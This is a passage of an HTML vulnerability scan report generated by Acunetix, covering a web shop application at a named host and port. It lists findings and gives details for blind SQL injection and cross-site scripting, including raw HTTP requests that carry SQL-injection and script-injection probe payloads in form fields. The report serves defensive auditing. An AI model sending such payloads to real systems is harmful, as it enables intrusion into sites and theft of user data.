<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN30">/yuliana/partners/displayParnerLetter</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img11.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Login page password-guessing attack</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN31">/yuliana/user/validation/j_security_check</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img12.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Possible sensitive directories</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN32">/yuliana/email</a></td><td class="s54">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN32">/yuliana/error</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN32">/yuliana/test</a></td><td class="s56">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img13.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Session Cookie without HttpOnly flag set</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN33">/</a></td><td class="s54">2</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">3</td>
</tr>
</table>
<a name="PageN4"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img14.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Session Cookie without Secure flag set</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN34">/</a></td><td class="s54">2</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img15.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">User credentials are sent in clear text</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN34">/yuliana/user/validation/validateUser</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img16.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Broken links</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN35">/yuliana/error</a></td><td class="s54">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN35">/yuliana/test</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN36">/yuliana/user/validation/j_security_check</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN36">/yuliana/user/validation/j_security_check (db746a20fd171d2e9bd5e94536a82782)</a></td><td class="s56">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img17.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Content type is not specified</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN37">/favicon.ico</a></td><td class="s54">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN37">/yuliana/cart/removeCartItem</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN38">/yuliana/cart/setQuantity</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN38">/yuliana/email/addToEmailList</a></td><td class="s56">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:596px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">4</td>
</tr>
</table>
<a name="PageN5"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s48" style="font-size:1px"><img src="WVSSingleScan0225.files/img18.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s49">Email address found</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN39">/yuliana/</a></td><td class="s54">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN39">/yuliana/cart/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN40">/yuliana/cart/displayCart</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN40">/yuliana/cart/displayQuickOrder</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN40">/yuliana/catalog/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN41">/yuliana/catalog/displayProduct</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN41">/yuliana/customer_service.jsp</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN42">/yuliana/email/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN42">/yuliana/email/join_email_list.jsp</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN43">/yuliana/error/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN43">/yuliana/images/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN43">/yuliana/partners/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN44">/yuliana/partners/displayParnerLetter</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN44">/yuliana/registration/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN44">/yuliana/registration/continueUser</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN45">/yuliana/registration/displayUserRegistration</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN45">/yuliana/registration/processUser</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN46">/yuliana/relatedDocs/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN46">/yuliana/relatedDocs/relatedDocs.jsp</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN46">/yuliana/test/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN47">/yuliana/user/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN47">/yuliana/user/account/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN48">/yuliana/user/account/displayAccount</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN48">/yuliana/user/account/displayAccountDetails</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN48">/yuliana/user/account/displayAccountPassword</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN49">/yuliana/user/account/updateUserDetails</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN49">/yuliana/user/account/updateUserPassword</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN50">/yuliana/user/order/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN50">/yuliana/user/order/displayInvoice</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN51">/yuliana/user/order/displayUserCart</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN51">/yuliana/user/review/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN52">/yuliana/user/review/addReview</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN52">/yuliana/user/review/displayReview</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN53">/yuliana/user/validation/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN53">/yuliana/user/validation/j_security_check</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN53">/yuliana/user/validation/validateUser</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN54">/yuliana/userAccess.jsp</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN54">/yuliana/validation/</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN55">/yuliana/validation/displayPasswordRecovery</a></td><td class="s56">1</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN55">/yuliana/validation/passwordRecovery</a></td><td class="s56">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img19.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Password type input with autocomplete enabled</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN56">/yuliana/user/validation/validateUser</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img20.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Web server default welcome page</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN57">Web Server</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:60px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">5</td>
</tr>
</table>
<a name="PageN6"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:26px">
<td colspan="19" class="s34">Alert details</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Blind SQL Injection</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img21.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">High</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (Blind_Sql_Injection.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:128px">
<td colspan="19" class="s13">This script is possibly vulnerable to SQL Injection attacks.<br><br>SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. <br><br>This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:159px">
<td colspan="19" class="s13">An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. <br><br>Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.<br><br>Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">Your script should filter metacharacters from user input. <br>Check detailed information for more information about fixing this vulnerability.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/account/updateUserDetails</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">URL encoded POST input city was set to Hayward' and '3'='3</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:217px">
<td colspan="19" class="s43">POST /yuliana/user/account/updateUserDetails HTTP/1.1<br>Content-Length: 308<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=25800%20Carlos%20Bee%20Boulevard&amp;address2=3137 Laguna Street&amp;city=Hayward%27%20and%2033-33%20%3d%20%270&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;firstName=fTest&amp;lastName=lTest&amp;state=CA&amp;zip=94542</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7617</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">6</td>
</tr>
</table>
<a name="PageN7"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:16px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Cross Site Scripting</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img22.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">High</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (XSS.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:97px">
<td colspan="19" class="s13">This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.<br><br>Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:50px">
<td colspan="19" class="s13">Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Your script should filter metacharacters from user input.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/addToEmailList</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">URL encoded GET input emailAddress was set to '&quot;()&amp;%1&lt;ScRiPt &gt;prompt(975562)&lt;/ScRiPt&gt;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:143px">
<td colspan="19" class="s43">GET /yuliana/email/addToEmailList?emailAddress=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28975562%29%3c%2fScRiPt%3e&amp;firstName=&amp;lastName= HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 199<br>Date: Sun, 26 Feb 2012 03:17:55 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/addToEmailList</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">URL encoded GET input firstName was set to '&quot;()&amp;%1&lt;ScRiPt &gt;prompt(976269)&lt;/ScRiPt&gt;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:143px">
<td colspan="19" class="s43">GET /yuliana/email/addToEmailList?emailAddress=&amp;firstName=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976269%29%3c%2fScRiPt%3e&amp;lastName= HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:14px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">7</td>
</tr>
</table>
<a name="PageN8"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 199<br>Date: Sun, 26 Feb 2012 03:17:55 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/addToEmailList</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">URL encoded GET input lastName was set to '&quot;()&amp;%1&lt;ScRiPt &gt;prompt(924441)&lt;/ScRiPt&gt;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:143px">
